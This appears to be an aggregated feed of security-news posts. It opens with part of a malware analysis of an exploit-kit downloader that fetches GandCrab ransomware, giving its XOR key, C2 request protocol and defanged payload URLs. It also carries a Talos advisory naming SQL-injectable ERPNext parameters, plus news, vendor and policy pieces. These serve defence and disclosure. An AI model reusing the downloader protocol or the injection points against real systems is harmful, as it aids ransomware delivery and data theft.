In either case, if the malware fails to replace system files successfully, it will copy itself at the locations listed in Table 2, and executes via ShellExecuteW.

Dump Path

Dump Name

%APPDATA%\Microsoft

{random alphabets}.exe

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

{random alphabets}.pif

Table 2: Alternate dump paths

On execution the malware checks if it is running as ctfmon.exe/rundll32 or as an executable in Table 2. If this check passes, the downloader branch starts executing (Figure 16).


Figure 16: Downloader code execution after image path checks

A mutex "Alphabeam ldr" is created to prevent multiple executions. Here payload URL decoding happens. Encoded data is copied to a blob via mov operations (Figure 17).


Figure 17: Encoded URL being copied

A 32-byte multi-XOR key is set up with the algorithm shown in Figure 18.


Figure 18: XOR key generation

XOR Key (83439fb10d4f9e18ea7d1ebb4009bdf7)

{ 0x25, 0x24, 0x60, 0x67, 0x00, 0x20, 0x23, 0x65, 0x6c, 0x00, 0x2f, 0x2e, 0x6e, 0x69, 0x00, 0x2a, 0x35, 0x73, 0x76, 0x00, 0x31, 0x30, 0x74, 0x73, 0x00, 0x3c, 0x3f, 0x79, 0x78, 0x00, 0x3b, 0x3a }

Finally, the actual decoding is done using PXOR with XMM registers (Figure 19).


Figure 19: Payload URL XOR decoding

This leads the way for the downloader switch loop to execute (Figure 20).


Figure 20: Response/Download handler

Table 3 shows a breakdown of HTTP requests, their expected responses (where body = HTTP response body), and corresponding actions.

Request #

Request URL

(Expected Response) body+0x0

body+0x4

body+0x7

Action

1

hxxp://91[.]210.104.247/update.bin

0x666555

0x0

url for request #2

Download payload via request #2, verify MZ and PE header, execute via CreateProcessW

1

hxxp://91[.]210.104.247/update.bin

0x666555

0x1

N/A

Supposed to be executing already downloaded payload via CreateProcess. However, the functionality has been shortcircuited; instead, it does nothing and continues loop after sleep

1

hxxp://91[.]210.104.247/update.bin

0x666555

0x2

url for request #2

Download payload via request #2, verify MZ and PE header, load it manually in native process space using its PE loader module

1

hxxp://91[.]210.104.247/update.bin

0x666555

0x3

N/A

Supposed to be executing already downloaded payload via its PE loader. However, the functionality has been shortcircuited; instead, it does nothing and continues loop after sleep

1

hxxp://91[.]210.104.247/update.bin

0x666555

0x4

url for request #3

Perform request #3

1

hxxp://91[.]210.104.247/update.bin

N/A

N/A

N/A

Sleep for 10 minutes and continue from request #1

2

from response #1

PE payload

N/A

N/A

Execute via CreateProcessW or internal PE loader, depending on previous response

3

from response #1

N/A

N/A

N/A

No action taken. Sleep for 10 minutes and start with request #1

Table 3: HTTP requests, responses, and actions

The request sequence leads to GandCrab ransomware being fetched and manually loaded into memory by the malware. Figure 21 and Figure 22 show sample request #1 and request #2 respectively, leading to the download and execution of GandCrab (8dbaf2fda5d19bab0d7c1866e0664035).


Figure 21: Request #1 fetching initial command sequence from payload URL


Figure 22: Request #2 downloads GandCrab ransomware that gets manually loaded into memory

Conclusion

In recent years, arrests and distruptions of underground operations have led to exploit kit activity declining heavily. Still, exploit kits pose a significant threat to users who are not running fully patched systems. Nowadays we see more exploit kit activity in the Asia Pacific region, where users tend to have more vulnerable software. Meanwhile, in North America, the focus tends to be on more straightforward social engineering campaigns.

FireEye Network Security detects all exploits, social engineering campaigns, malware, and command and control communication mentioned in this post. MVX technology used in multiple FireEye products detects the first stage and second stage malware described in this post.

Indicators of Compromise

Domain / IP / Address / Filename

MD5 Hash Or Description

finalcountdown.gq, naosecgomosec.gq,

ladcbteihg.gq, dontneedcoffee.gq

Exploit kit domains

78.46.142.44, 185.243.112.198

Exploit kit IPs

47B5.tmp

4072690b935cdbfd5c457f26f028a49c

hxxp://46.101.205.251/wt/ww.php

 

hxxp://107.170.215.53/workt/trkmix.php?device=desktop&country=AT&connection.type=BROADBAND&clickid=58736927880257537&countryname=
Austria&browser=ie&browserversion=11&carrier=%3F&cost=0.0004922&isp=BAXALTA+INCORPORATED+ASN&os=windows&osversion=6.1&useragent=
Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+Trident%2F7.0%3B+rv%3A11.0%29+like+Gecko&campaignid=1326906&language=de&zoneid=1628971

 

Redirect URL examples used between malvertisement and exploit kit controlled domains

91.210.104[.]247/update.bin

Second stage payload download URL

91.210.104[.]247/not_a_virus.dll

8dbaf2fda5d19bab0d7c1866e0664035

 

Second stage payload (GandCrab ransomware)

Acknowledgements

We would like to thank Hassan Faizan for his contributions to this blog post.

Fortnite’s Google Play rebuff sparks security concerns for Android users

There’s been no small outbreak of chaos in mobile land recently, all because of an astonishingly popular game called Fortnite.

Here’s the thing: people refer to Android as “open platform,” saying that, in theory, you can do what you want with it. In practice, you buy an Android phone and then you’re locked into apps from the Google Play store. You can switch things off to allow external installs, but it’s generally not advisable, as it leaves the gate open to potentially dubious installs.

You can delve into discussions about whether Android is open source or not, but the conversation is a little more complicated and nuanced than simply answering “yes” or “no.”

With all of the above discord thrown into a melting pot and swirled around, Fortnite steps in and rattles a few more cages.

What happened?

The developers, Epic, decided that they’d rather offer the game on mobile outside of Google Play, which drastically increases the amount of revenue not nibbled at by Google. There are multiple potential issues with this:

  • Having children enable the “allow installs from unknown sources” option on an Android is a recipe for disaster. It not only means many of them will inevitably end up downloading a rogue app by mistake, it also means that those phones are now less secure than the fully locked-down Android devices out there.
  • As pointed out on Twitter, even children with legitimate installs of Fortnite onboard will eventually fall foul to something nasty because the phone is splashing around in the metaphorical malware mud.
  • Everything comes down to how well promoted the official download link is, and how efficiently the game developers tell people to only grab the game from that one specific link.
  • Epic needs to ensure they don’t fall victim to sophisticated SEO scams pointing links away from their site and toward bad downloads, and also that their site security is top notch. If the page is compromised, a rogue download link might be waiting in the wings.

That’s how the initial landscape looked shortly after Epic’s announcement, and many predicted things would quickly go horribly wrong.

Did things go horribly wrong?

They most certainly did. In the end, it wasn’t even a rogue app causing mayhem but an issue found with Fortnite’s installer that allowed for the possibility of rogue apps onboard to hijack the installer and install their own junkware. The so-called “Man in the Disk” attack looks for apps not locking down external storage as well as they should, and quickly gets to work exploiting things happening under the hood.

The uproar over the installer kerfuffle was rounded off with a bit of a fierce debate on Twitter, because that’s what happens with everything in life now.

What happens next?

Whether they like it or not, Epic are now the standard bearer for “app developer going off range into the (incredibly wealthy and insecure) wilderness.” I don’t believe an Android app has attracted quite this much attention before, and that’s without throwing the no Google Play install angle into the mix.

What they’re also stuck with is the realization that for as long as they continue to remain outside of the Google Play ecosystem, stories will come back to haunt them regarding malware installs masquerading as the real thing, social engineering tricks convincing children to download dodgy Fortnite add-ons from Russian servers, and potential SEO poisoning leading would-be gamers astray.

Google Play certainly isn’t perfect, and plenty of rogue apps have been found lurking there through the years. I think most security professionals would argue it’s still an awful lot riskier to switch off the unknown source install ban than it is to visit Play and grab an app, though.

Let’s also not single out Epic on this one; it’s not just game developers taking tentative steps into the world of unknown installs—even mobile phone providers do it. About four or five years ago, I replaced my phone and took out a package deal with a well-known UK retailer. Part of the deal was “six free games for your Android.” Sounds great, right? Except I quickly realized that to get the games, you had to enable unknown source installs and download the six .APK files directly from the phone provider’s website.

At no point did anyone say anything about how turning off a security feature of the phone I’d just been sold was a bad idea. Nothing in the literature provided mentioned anything beyond, “Wow, turning this off is a really good idea, free games! Wow!” This is also at a time when I was regularly writing about fake Angry Birds/Flappy Bird downloads hosted on Russian websites.

Once installed (via dragging and dropping from desktop to mobile through the magic of USB cables), those fake bird-themed games would typically try and perform premium rate SMS shenanigans. This only worked because some people were running around with unknown source installs permitted, and they’d still have to try and social engineer the ones that weren’t into turning it on.

Unknown installs: so hot right now

Now we’re at a point where unknown source installs are not only mainstream but currently attached to the wheels of an absolute gaming juggernaut. There are serious security issues that Epic needs to consider, and it’s going to be fascinating looking back in six to 12 months and deciding if promoting unknown source installs in this way caused a maelstrom of security headaches from all sides, or a large pile of “absolutely nothing much happened.”

If it’s the latter, you can bet more developers will want to take advantage of this method. Then the threat landscape will become significantly more complicated in mobile land.

The post Fortnite’s Google Play rebuff sparks security concerns for Android users appeared first on Malwarebytes Labs.

Hazards Ahead: The Dangers of Runaway Technology

Technology has advanced at an astonishing rate in the last decade, and the pace is only set to accelerate. Capabilities that seemed impossible only a short time ago will develop extremely quickly, aiding those who see them coming and hindering those who don’t. Developments in smart technology will create new possibilities for organizations of all kinds – but they will also create opportunities for attackers and adversaries by reducing the effectiveness of existing controls. Previously well-protected information will become vulnerable.

Collaborate Confidently With Analyst Notes in Recorded Future

In today’s workplace, teams are often spread out across geographies. While that makes for an effective way to conduct global business across multiple time zones, it also often makes collaborative work more difficult. Especially with the time-sensitive work that security professionals do on a daily basis, the ability to collaborate effectively is fundamental to a team’s success.

Analyst Notes is a capability within Recorded Future that enables teams, no matter where they’re located, to collaborate with one another through private notes visible only within their organization. When researching alerts or trying to understand more about a threat actor, this capability is enormously helpful in allowing teams to document their findings about a potential threat and communicate them to the larger team, saving everyone from having to produce duplicative work.

Adding Analyst Note

Adding an Analyst Note to an Intelligence Card.

Analyst Note Free Text

Free text within an Analyst Note goes through Recorded Future’s natural language processing, creating linked entities and automatic context.

A unique aspect of the Analyst Notes capability is that with our natural language processing abilities, all notes that you input into Recorded Future become a contextualized part of your Recorded Future instance. Rather than your notes remaining static, they become a dynamic part of your threat intelligence, extending your knowledge beyond one note.

Intelligence Card

Final Analyst Note in an Intelligence Card.

In an industry where time can be the difference between your organization being protected and being compromised, every minute counts. No matter what solution you use, the ability to collaborate with fellow team members should be a fundamental part of your security strategy, helping you save time, operate more effectively, and better protect your organization.

To learn more about using Recorded Future for team collaboration on analysis findings, request a personalized demo.

The post Collaborate Confidently With Analyst Notes in Recorded Future appeared first on Recorded Future.

     

Vulnerability Spotlight: TALOS-2018-0560 – ERPNext SQL Injection Vulnerabilities

Vulnerabilities discovered by Yuri Kramar from the Cisco Security Advisor Team


Overview

Talos is disclosing multiple SQL injection vulnerabilities in the Frappe ERPNext Version 10.1.6 application. Frappe ERPNext is an open-source enterprise resource planning (ERP) cloud application. These vulnerabilities enable an attacker to bypass authentication and get unauthenticated access to sensitive data. An attacker can use a normal web browser to trigger these vulnerabilities — no special tools are required.

Details

The vulnerabilities were assigned to the CVE IDs CVE-2018-3882 - CVE-2018-3885. An attacker can use the following parameters for SQL injection:

CVE-2018-3882 - searchfield parameter
query=erpnext.controllers.queries.

CVE-2018-3883 - employee parameter
cmd=erpnext.hr.doctype.leave_application.leave_application.

CVE-2018-3883 - sort_order parameter
cmd=erpnext.stock.dashboard.item_dashboard.

CVE-2018-3884 - sort_by parameter 
cmd=erpnext.stock.dashboard.item_dashboard.

CVE-2018-3884 - start parameter
cmd=erpnext.stock.dashboard.item_dashboard.

CVE-2018-3885
cmd=frappe.desk.reportview.

More technical details can be found in the Talos vulnerability reports.

Coverage

The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rule: 46165-46172





19-Year-Old Hacker Arrested Over Making Hoax School and Flight Bomb Threats

British police have arrested a 19-year-old teen who is an alleged member of Apophis Squad cybercriminal group responsible for making hoax bomb threats to thousands of schools and airlines; and DDoSing ProtonMail and Tutanota secure email services. George Duke-Cohan was arrested in his bedroom at his family home in Watford by British National Crime Agency (NCA) on 31st August and pledged

CISSP Certification Course — Become An IT Security Professional

If you dream of making it big in the IT security community, the CISSP certification is a necessary milestone. Certified Information Systems Security Professional (CISSP) is a globally recognised certification in the field of information security, which has become a gold standard of achievement that is acknowledged worldwide. CISSP certification deals with a range of information security

In Ulyanovsk, the Deputy Director was detained for hacking the Education Management Server



FSB officers detained the Deputy Director of the school in Ulyanovsk on suspicion of illegal access to information resources of the City Education Department.

According to the reports, the Deputy Director of the school in December last year hacked the Department's server, deleted all the data of students and teachers, accounting records, emails and modified the software.

During the interrogation, the detainee admitted that he was offended and angry at the unfair attitude of the management to him, and he decided to take revenge.

A criminal case has been opened against the man. He faces up to 5 years in prison.

The hacker's lawyer said that the court can cancel the criminal prosecution and assign the defendant a fine of $ 7,320, as the man pleaded guilty.

Gartner SOAR Adoption Rate Prediction: From 1% to 15% by 2020 – Why Should You Care?

In a recent report, Gartner predicted that SOAR adoption rates will rise from 1% to 15% by 2020. These findings highlight two key factors. Firstly, acceptable SOAR protocols are currently lacking in most corporations. Secondly, SOAR tools are gaining in traction and popularity as market validation occurs. The anticipated leap to 15% adoption in under two years is evidence of this.

SOAR tools are quickly emerging and will have a major impact on business.

What Exactly is SOAR?

The purpose of Security Orchestration, Automation, and Response (SOAR) tools are to allow companies to mitigate rising security threats quickly. Adopting SOAR tools will ensure that corporations are better prepared to identify and isolate potential threats before they become a serious issue. SOAR tools allow companies to be proactive as well as reactive in the fight against cybercrime.

Gartner defines SOAR as technologies that allow companies to collect all types of security threats, alerts, and data from various sources and analyze and respond to them in one place. Using SOAR tools, organizations can identify and eliminate duplicates and false positives, which allows security analysts to focus on real threats most efficiently. By leveraging human expertise and the time savings afforded by automation and orchestration, decision-making and reaction times can be significantly faster.

One of the main challenges in the cybersecurity industry today is detection of cyber threats. Dwell times are currently estimated to average six months. This means that malware and other malicious code can be entrenched in a company’s ecosystem, gathering information long before the unthinkable happens. Speed is of the essence when it comes to combating bad actors. SOAR tools allow companies to clearly define incident management and response as well as implement these processes at scale.

Why SOAR and Why Now?

Cybercrime is a pressing and rising problem, costing the global economy an estimated  $450 billion a year. As new technologies evolve to fight cyber criminals, so too do the tactics and agility of the perpetrators. The average company is simply unprepared to deal with this impending threat. Building a larger firewall will only cause the attacker to go out and look for a longer metaphorical ladder.

One only has to look at disastrous high profile cases like Equifax to see the implications of major hacking attacks. As attackers become better at finding new methods of cracking passwords or breaking firewalls, traditional security technologies are being left in the dust. Worse still, many security operations rely primarily on manually created documentation and outdated protocols, tools, and processes. Security teams that are ramping up investments against cybercrime are often dispersed and disorganized. They have a plethora of tools at their fingertips, but no cohesive way of using them to effectively eradicate the threat.

SOAR is proving to be a vital way of giving security professionals a roadmap to predict, prevent, and tackle threats effectively. Orchestration provides a vital conduit to unify security tools and their actions in common windows, automation allows repetitive tasks to be executed at machine speed, and incident management provides full visibility across the attack lifecycle.

SOAR Market Validation

Market validation is beginning to occur as SOAR tools are being increasingly adopted by key players. Microsoft's acquisition of Hexadite, Splunk's acquisition of Phantom, and IBM taking over Resilient Systems will help to speed up widespread adoption of SOAR as companies large and small follow in their footsteps.

Moreover, as more security organizations are faced with the challenges of limited resources and a lack of talent in cyberspace, there is a growing need to harness technology to automate and streamline workflows. Not only will SOAR tools help to resolve the talent gap, but their adoption will also reduce costs and expedite response.

Conclusion

If corporations around the globe keep dragging their heels in the fight against cybercrime, they run the risk of losing money and suffering reputational damage. SOAR tools allow for an effective way of fighting security threats through a central collection of intelligence that can be quickly transformed into action.

As has been showcased by multiple public data breaches and filled column inches, security threats are omnipresent. Organizing an efficient response through sophisticated tools that scale companies’ resources, improve response times, and automate mundane security tasks will be vital to thwart attackers.

About the author: Rishi Bhargava a co-founder of Demisto. A creative thinker and problem solver, Rishi has been building and managing successful enterprise products for many years. Making things “simple” is really hard. Rishi believes simplicity in every aspect will delight Demisto customers and has made it the guiding principle.

Copyright 2010 Respective Author at Infosec Island

BitTorrent launches uTorrent Web for simple torrenting experience

uTorrent Web is the next generation of torrenting from BitTorrent

BitTorrent, Inc., the company behind the world’s most popular P2P communications protocol, has officially released the first version of µTorrent Web to help users quickly download and play torrent files inside their browser.

µTorrent Web (not to be confused with uTorrent) is a Web-based torrent client for Windows that aims to make torrenting simpler and most importantly it supports torrent streaming.

“Our vision for µTorrent Web was to build a torrent client with quick playability and simplicity at its core,” said BitTorrent, Inc. in a press release statement.

“Through years of serving the BitTorrent community with products used by hundreds of millions of users, we took our passion and experience to build a torrent client that meets the streaming demands of today’s users.”

BitTorrent commonly refers to the infamous peer-to-peer (P2P) file-sharing protocol associated with piracy. Each year, BitTorrent’s desktop and mobile products are installed on hundreds of millions of new devices across 138 countries worldwide.

ALSO READ: Here’s all you need to know what Torrents are and how they work

Despite the web-based version release, BitTorrent will continue to maintain the desktop version of uTorrent, now referred as uTorrent Classic.

“As µTorrent Web now comes out of Beta and into full release, we know that millions of our users are familiar with and love the desktop version of µTorrent, also known as µTorrent Classic.

Our long-term plan is to continue development across both products and make them available on utorrent.com,” the company notes.

The product can be downloaded at utorrent.com and is currently available only for Windows. However, the company has plans to release a Mac version in the future.

The application is compatible with all major browsers such as Chrome, Firefox, Internet Explorer, Opera, and Microsoft Edge.

Check out the video below by µTorrent Web Product Designer Cory Keller, where he speaks about the new version of the torrenting tool.

ALSO READ: Top 10 Most Popular Torrent Sites (2018 edition)

The post BitTorrent launches uTorrent Web for simple torrenting experience appeared first on TechWorm.

Five-Eyes Intelligence Services Choose Surveillance Over Security

The Five Eyes -- the intelligence consortium of the rich English-speaking countries (the US, Canada, the UK, Australia, and New Zealand) -- have issued a "Statement of Principles on Access to Evidence and Encryption" where they claim their needs for surveillance outweigh everyone's needs for security and privacy.

...the increasing use and sophistication of certain encryption designs present challenges for nations in combatting serious crimes and threats to national and global security. Many of the same means of encryption that are being used to protect personal, commercial and government information are also being used by criminals, including child sex offenders, terrorists and organized crime groups to frustrate investigations and avoid detection and prosecution.

Privacy laws must prevent arbitrary or unlawful interference, but privacy is not absolute. It is an established principle that appropriate government authorities should be able to seek access to otherwise private information when a court or independent authority has authorized such access based on established legal standards. The same principles have long permitted government authorities to search homes, vehicles, and personal effects with valid legal authority.

The increasing gap between the ability of law enforcement to lawfully access data and their ability to acquire and use the content of that data is a pressing international concern that requires urgent, sustained attention and informed discussion on the complexity of the issues and interests at stake. Otherwise, court decisions about legitimate access to data are increasingly rendered meaningless, threatening to undermine the systems of justice established in our democratic nations.

To put it bluntly, this is reckless and shortsighted. I've repeatedly written about why this can't be done technically, and why trying results in insecurity. But there's a greater principle at first: we need to decide, as nations and as society, to put defense first. We need a "defense dominant" strategy for securing the Internet and everything attached to it.

This is important. Our national security depends on the security of our technologies. Demanding that technology companies add backdoors to computers and communications systems puts us all at risk. We need to understand that these systems are too critical to our society and -- now that they can affect the world in a direct physical manner -- affect our lives and property as well.

This is what I just wrote, in Click Here to Kill Everybody:

There is simply no way to secure US networks while at the same time leaving foreign networks open to eavesdropping and attack. There's no way to secure our phones and computers from criminals and terrorists without also securing the phones and computers of those criminals and terrorists. On the generalized worldwide network that is the Internet, anything we do to secure its hardware and software secures it everywhere in the world. And everything we do to keep it insecure similarly affects the entire world.

This leaves us with a choice: either we secure our stuff, and as a side effect also secure their stuff; or we keep their stuff vulnerable, and as a side effect keep our own stuff vulnerable. It's actually not a hard choice. An analogy might bring this point home. Imagine that every house could be opened with a master key, and this was known to the criminals. Fixing those locks would also mean that criminals' safe houses would be more secure, but it's pretty clear that this downside would be worth the trade-off of protecting everyone's house. With the Internet+ increasing the risks from insecurity dramatically, the choice is even more obvious. We must secure the information systems used by our elected officials, our critical infrastructure providers, and our businesses.

Yes, increasing our security will make it harder for us to eavesdrop, and attack, our enemies in cyberspace. (It won't make it impossible for law enforcement to solve crimes; I'll get to that later in this chapter.) Regardless, it's worth it. If we are ever going to secure the Internet+, we need to prioritize defense over offense in all of its aspects. We've got more to lose through our Internet+ vulnerabilities than our adversaries do, and more to gain through Internet+ security. We need to recognize that the security benefits of a secure Internet+ greatly outweigh the security benefits of a vulnerable one.

We need to have this debate at the level of national security. Putting spy agencies in charge of this trade-off is wrong, and will result in bad decisions.

Cory Doctorow has a good reaction.

Slashdot post.

Tripwire Patch Priority Index for August 2018

Tripwire’s August 2018 Patch Priority Index (PPI) brings together the top vulnerabilities from Microsoft and Adobe. First on the patch priority list this month are patches for Microsoft’s Internet Explorer, Edge, and Scripting Engine. These patches resolve 21 vulnerabilities, including fixes for Remote Code Execution, Elevation of Privilege, Information Disclosure, Memory Corruption, Security Feature Bypass, […]… Read More

The post Tripwire Patch Priority Index for August 2018 appeared first on The State of Security.

Use This NERC CIP v6 Standards Summary to Stay Compliant

Thanks to FERC’s Order 822, the North American Electric Reliability Corporation’s critical infrastructure protection standards, known as NERC CIP, are continually updated. Seven updated standards proposed by NERC for inclusion have now been accepted. April 1st, 2016, was the compliance deadline for the NERC CIP v5 requirements. Most of the newly-approved standards had a compliance […]… Read More

The post Use This NERC CIP v6 Standards Summary to Stay Compliant appeared first on The State of Security.

Threat Landscape for Industrial Automation Systems in H1 2018

For many years, Kaspersky Lab experts have been uncovering and researching cyberthreats that target a variety of information systems – those of commercial and government organizations, banks, telecoms operators, industrial enterprises, and individual users. In this report, Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT) publishes the findings of its research on the threat landscape for industrial automation systems conducted during the first half of 2018.

The main objective of these publications is to provide information support to global and local incident response teams, enterprise information security staff and researchers in the area of industrial facility security.

Key events

Energetic Bear/Crouching Yeti: attacks on servers

In February, Kaspersky Lab ICS CERT published a report on an investigation into the initial infection tactics used by the notorious APT group Energetic Bear/Crouching Yeti, as well as the results of an analysis of several web servers compromised by the group in 2016 and early 2017, using information provided by the server owners.

Energetic Bear/Crouching Yeti has been active since at least 2010, attacking companies and individuals in various countries. The specialists at CrowdStrike initially noted a strong focus on the energy and industrial sectors, which may explain the name Energetic Bear. Later, when the diversity of the group’s attacks became clearer, the researchers at Kaspersky Lab named it Crouching Yeti. The targets of the attacks are mainly concentrated in Europe and the US. Recently, the number of attacks on companies in Turkey increased significantly. According to US-CERT and the UK National Cyber Security Centre, the Energetic Bear/Crouching Yeti APT group is linked to the Russian government.

The initial infection tactics used by the group is a multi-step process that begins with phishing emails being sent out with malicious documents and infecting various servers. Some infected servers are used by the group as auxiliaries – used only for hosting various tools. Others are infected so they can be used in watering hole attacks, with some servers hosting an SMB link that leads to other servers that steal the authentication data of potential victims.

With some rare exceptions, the Energetic Bear/Crouching Yeti group uses publicly available tools to carry out their attacks. All the utilities discovered by the Kaspersky Lab ICS CERT experts have open source code that is freely available on GitHub. This makes the task of attack attribution very difficult without additional group “markers”.

In most cases observed by Kaspersky Lab ICS CERT, the attackers performed tasks to identify vulnerabilities, gain persistence on different nodes and steal authentication data in order to develop the attack further.

An analysis of the compromised servers and the attacks on them showed that for Energetic Bear/Crouching Yeti, almost any vulnerable server on the internet is seen as a potential foothold from which to develop targeted attacks.

The investigation into the initial, intermediate and subsequent targets of these attacks also revealed a diverse geography. The largest number of victims and targets was in Russia, followed by Turkey and Ukraine. Under half of the systems attacked were related to industry, agricultural services and utilities.

Attacks on industrial enterprises using RATs

Kaspersky Lab ICS CERT reported on yet another wave of phishing emails containing malicious attachments aimed primarily at industrial enterprises in Russia. The malicious program used in the attacks installs legitimate software for remote administration – TeamViewer or Remote Manipulator System/Remote Utilities (RMS) – that allows attackers to gain remote control over the targeted systems. Various techniques are used to mask the presence and activity of the unauthorized software.

When they need to move further within a compromised network, the attackers can download an additional set of malicious programs, which is specifically tailored to the attack on each individual victim. This set of malware may contain spyware, additional remote administration tools, software to exploit vulnerabilities in the operating system and application software, as well as the Mimikatz utility, which makes it possible to obtain account data for Windows accounts.

Also, Kaspersky Lab products blocked multiple attacks on the industrial network of an automobile manufacturer and service company, in particular, on computers designed to diagnose the engines and onboard systems of trucks and heavy-duty vehicles.

A RAT was installed and intermittently used on at least one of the computers in the company’s industrial network. Over a period of several months, numerous attempts to launch various malicious programs using the RAT were blocked on the computer. The blocked programs included modifications of the malware detected by Kaspersky Lab products as Net-Worm.Win32.Agent.pm. When launched this worm immediately begins to proliferate on the local network using exploits for the MS17-010 vulnerabilities – the same ones that were published by ShadowBrokers in the spring of 2017 and were used in attacks by the infamous WannaCry and ExPetr cryptors.

The Trojan-Downloader.Nymaim malware family was also blocked. Representatives of this family are often used to download modifications of the Necus family botnet agent which in turn is used to infect computers with ransomware from the Locky family.

Statistics

All statistical data used in this report was collected using the Kaspersky Security Network (KSN), a distributed antivirus network. The data was received from those KSN users who gave their consent to have data anonymously transferred from their computers. We do not identify the specific companies/organizations sending statistics to KSN, due to the product limitations and regulatory restrictions.

Methodology

The data was received from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. This group includes Windows computers that perform one or several of the following functions:

  • supervisory control and data acquisition (SCADA) servers;
  • data storage servers (Historian);
  • data gateways (OPC);
  • stationary workstations of engineers and operators;
  • mobile workstations of engineers and operators;
  • Human Machine Interface (HMI).

The statistics analyzed also include data received from computers of industrial control network administrators and software developers who develop software for industrial automation systems.

For the purposes of this report, attacked computers are those on which our security solutions have been triggered at least once during the reporting period. When determining percentages of machines attacked, we use the ratio of unique computers attacked to all computers in our sample from which we received anonymized information during the reporting period.

ICS servers and stationary workstations of engineers and operators often do not have full-time direct internet access due to restrictions specific to industrial networks. Internet access may be provided to such computers, for example, during maintenance periods.

Workstations of system/network administrators, engineers, developers and integrators of industrial automation systems may have frequent or even full-time internet connections.

As a result, in our sample of computers categorized by Kaspersky Lab ICS CERT as part of the industrial infrastructure of organizations, about 42% of all machines had regular or full-time internet connections in H1 2018. The remaining machines connected to the Internet no more than once a month, many much less frequently than that.

Main figures

The percentage of ICS computers attacked in H1 2018 increased by 3.5 p.p. compared with H2 2017 and reached 41.2%. The year-over-year increase was 4.6 p.p.

Percentage of ICS computers attacked, H1 2017 – H1 2018

A comparison between different regions of the world shows that:

  • countries in Africa, Asia and Latin America are significantly worse off in terms of the percentage of ICS computers attacked than countries in Europe, North America and Australia;
  • the figures for Eastern Europe are considerably greater than those for Western Europe;
  • the percentage of ICS computers attacked in Southern Europe is higher than that in Northern and Western Europe.

Presumably, this situation could be due to the amounts of funds invested by organizations in infrastructure protection solutions.

Percentage of ICS systems attacked in regions of the world, H1 2018 vs H2 2017

The main sources of infection for computers in organizations’ industrial network infrastructure are the internet, removable media and email. Contrary to the conventional wisdom about control networks being isolated, in the past years the internet became the main source of infection for computers on organizations’ industrial networks.

Main sources of threats blocked on ICS computers (percentage of computers attacked during half-year periods), H12017 – H1 2018

While a year ago, in H1 2017, the internet was the source of threats blocked on 20.6% of ICS computers, in H1 2018 the figure was as high as 27.3%.

Main sources of threats blocked on ICS computers by region, H1 2018

More information about events during H1 2018, detailed statistics and our recommendations you may find in the full version of the report (PDF)

Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT) is a global project launched by Kaspersky Lab in 2016 to coordinate the efforts of automation system vendors, industrial facility owners and operators, and IT security researchers to protect industrial enterprises from cyberattacks. Kaspersky Lab ICS CERT devotes its efforts primarily to identifying potential and existing threats that target industrial automation systems and the Industrial Internet of Things.

Throwback Thursday: Well, trial and error IS a mechanism

New regulations go into effect requiring more physical and electronic security at this health insurance company, so the company hires a chief security officer to oversee the efforts, says a pilot fish there.

"I was involved in the original security implementation on most of the systems and offered to help, but the new CSO refused our input," fish says. "He put keycard access on the computer room and UPS room and confiscated any physical keys he could find.

"When asked what would happen if the keycard system went down, he responded that 'mechanisms are in place,'" fish recalls.

Soon, only three people have physical keys: the CSO, chief financial officer and facilities manager.

To read this article in full, please click here